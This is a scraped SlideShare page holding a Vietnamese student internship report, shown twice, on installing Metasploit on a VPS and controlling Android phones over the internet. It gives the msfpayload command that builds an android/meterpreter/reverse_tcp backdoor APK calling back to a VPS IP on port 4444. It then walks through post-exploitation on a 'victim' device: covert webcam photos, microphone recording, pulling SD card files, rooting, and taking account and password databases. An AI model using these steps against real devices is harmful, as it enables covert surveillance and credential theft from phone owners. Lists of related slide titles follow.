ݺߣ

ݺߣShare a Scribd company logo
Sinh viên thực tập : Huỳnh Thị Chúc Thanh 
II. Thực hiện trên môi trường internet 
1.Cài mã độc trên VPS 
1.1 Cài đặt Metasploit lên VPS 
a. Giới thiệu 
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn 
công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng 
Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy 
trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 
b. Cài đặt 
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn 
phiên bản Community miễn phí và dùng cho nghiên cứu. 
Sau 
khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác. 
Chọn folder cài đặt:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: 
Chọn server và ngày hết hạn, để mặc định:
Quá trình cài đặt của Metasploit: 
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
Sau khi Finish trình duyệt web mở lên và đi tới giao diện 
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào 
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create 
Account:
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn 
phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 
2.Từ VPS điều khiển thiết bị qua internet 
Các bước thực hiện 
1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào
Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS 
Chúng ta vẫn sử dụng lệnh “Msfpayload 
android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > 
/root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132 
2. Khởi động Metasploit Console trên VPS 
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần 
trên, ở đây chỉ khác là sử dụng chính IP của VPS
4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị 
hack
Để xem thông tin về máy, nhập lệnh SysInfo
• Sử dụng camera: 
Để xem danh sách camera, nhập webcam_list 
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở 
danh sách camera ở phần trước. 
• Ghi âm 
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
• Lấy file từ sd card 
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục 
Dùng lệnh cd /sdcard/Download để vào thư mục 
Để tải về máy, ta nhập lệnh 
Download madoc.apk
Một số lệnh khác : 
để upload gõ lệnh upload 
Và file này sẽ được tải về thư mục root của máy Kali 
Gõ shell để vào lệnh 
kiểm tra xem có root chưa gõ 
su 
whoami 
Nếu báo unknown id is 0 tức là đã root 
ls -l danh mục file và các quyền 
cd để chuyển hướng thư mục 
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền 
/DATA 
/DATA/APP 
/DATA/SYSTEM 
/DATA/SYSTEM/accounts.db 
/DATA/SYSTEM/SYNC/accounts.xml 
/SYSTEM/APP/ 
để xem danh sách và down load các file hay thay đổi các file trong ROM 
đầu tiên phải gõ lệnh SU để có toàn quyền truy cập 
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename 
Ví dụ chmod -R 777 /data 
^C để quay lại 
Sử dụng SQLite để mở file db

More Related Content

What's hot (20)

DOCX
Cài đặt kali linux trên máy ảo VMware
Nguyen Stone
PDF
Lab 11 ftp server
Pham Viet Dung
DOCX
Hướng dẫn cài đặt centOS 6.5-Thực Tập Athena
quocluong
DOCX
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
laonap166
PDF
php với oracle database
Ngo Trung
PPT
19 web server
Cơn Gió
PPT
Dos web server it-slideshares.blogspot.com
phanleson
DOCX
Cài đặt dịch vụ ssh trên local - Thực tập Athena
quocluong
PDF
Lab 2 nâng cấp windows server 2003 lên windows server 2008 .pdf
Pham Viet Dung
DOC
Cài đặt exchange server 2013 cùng domain với exchange server 2007
laonap166
DOCX
Hướng dẫn cài đặt cent os 6.5
thienma217
DOC
De cuongthuchanhct221 hk2_1920_n1
Nahudi Nguyễn
PDF
Postfix Dovecot CentOS 6.5
thienma217
PDF
Lab linux phần iv- Internet Services
xeroxk
PDF
Lesson 7 - Linux Shell Programming
Thang Man
DOCX
Bao cao tuan 2
Phuong Ngo
DOC
Báo cáo thực tập giữa kỳ
Móccứcmũi Thúvuitaonhã
Cài đặt kali linux trên máy ảo VMware
Nguyen Stone
Lab 11 ftp server
Pham Viet Dung
Hướng dẫn cài đặt centOS 6.5-Thực Tập Athena
quocluong
Chuẩn bị kế hoạch nâng cấp domain controller windows 2003 lên 2008 2012
laonap166
php với oracle database
Ngo Trung
19 web server
Cơn Gió
Dos web server it-slideshares.blogspot.com
phanleson
Cài đặt dịch vụ ssh trên local - Thực tập Athena
quocluong
Lab 2 nâng cấp windows server 2003 lên windows server 2008 .pdf
Pham Viet Dung
Cài đặt exchange server 2013 cùng domain với exchange server 2007
laonap166
Hướng dẫn cài đặt cent os 6.5
thienma217
De cuongthuchanhct221 hk2_1920_n1
Nahudi Nguyễn
Postfix Dovecot CentOS 6.5
thienma217
Lab linux phần iv- Internet Services
xeroxk
Lesson 7 - Linux Shell Programming
Thang Man
Bao cao tuan 2
Phuong Ngo
Báo cáo thực tập giữa kỳ
Móccứcmũi Thúvuitaonhã

Similar to Bao cao vps (20)

DOCX
Xâm nhập điện thoại android qua vps trên internet
thach28
DOCX
Metasploit
Tân Trần
DOCX
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Anh Hiếu
DOCX
Cách tạo mã độc trên kali linux và triển khai trên android ảo
thach28
DOCX
Báo cáo tuần 5
Hà Tiên Nhi
DOCX
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
phanconghien
DOCX
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Trọng An
PDF
BÁO CÁO THỰC TẬP - TUẦN 6
kakawpah0911
DOCX
Bao cao tuan 2
Thiên Nguyễn
DOCX
Bai bao cao 4
tuankiet123
DOCX
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Xuân Ngọc Nguyễn
DOCX
Báo cáo tuần 4
Hà Tiên Nhi
PDF
Kali Linux
Chuc Thanh
DOCX
tao ma doc tren kalilinux
Võ Thành Đạt
DOCX
Hack android dùng metasploit cài trên VPS
Lê Lãnh
DOCX
Athena tuần 4
thanhthong1210
DOCX
Cai dat metasploit community tren windows và ubuntu
thach28
PDF
BÁO CÁO THỰC TẬP - TUẦN 3-4
kakawpah0911
Xâm nhập điện thoại android qua vps trên internet
thach28
Metasploit
Tân Trần
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Anh Hiếu
Cách tạo mã độc trên kali linux và triển khai trên android ảo
thach28
Báo cáo tuần 5
Hà Tiên Nhi
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
phanconghien
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Trọng An
BÁO CÁO THỰC TẬP - TUẦN 6
kakawpah0911
Bao cao tuan 2
Thiên Nguyễn
Bai bao cao 4
tuankiet123
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Xuân Ngọc Nguyễn
Báo cáo tuần 4
Hà Tiên Nhi
Kali Linux
Chuc Thanh
tao ma doc tren kalilinux
Võ Thành Đạt
Hack android dùng metasploit cài trên VPS
Lê Lãnh
Athena tuần 4
thanhthong1210
Cai dat metasploit community tren windows và ubuntu
thach28
BÁO CÁO THỰC TẬP - TUẦN 3-4
kakawpah0911
Ad

Bao cao vps

  • 1. Sinh viên thực tập : Huỳnh Thị Chúc Thanh II. Thực hiện trên môi trường internet 1.Cài mã độc trên VPS 1.1 Cài đặt Metasploit lên VPS a. Giới thiệu Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. b. Cài đặt Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu. Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác. Chọn folder cài đặt:
  • 2. Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: Chọn server và ngày hết hạn, để mặc định:
  • 3. Quá trình cài đặt của Metasploit: Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
  • 4. Sau khi Finish trình duyệt web mở lên và đi tới giao diện Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account:
  • 5. Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 2.Từ VPS điều khiển thiết bị qua internet Các bước thực hiện 1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào
  • 6. Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132 2. Khởi động Metasploit Console trên VPS 3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS
  • 7. 4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack
  • 8. Để xem thông tin về máy, nhập lệnh SysInfo
  • 9. • Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. • Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
  • 10. • Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải về máy, ta nhập lệnh Download madoc.apk
  • 11. Một số lệnh khác : để upload gõ lệnh upload Và file này sẽ được tải về thư mục root của máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách và down load các file hay thay đổi các file trong ROM đầu tiên phải gõ lệnh SU để có toàn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data ^C để quay lại Sử dụng SQLite để mở file db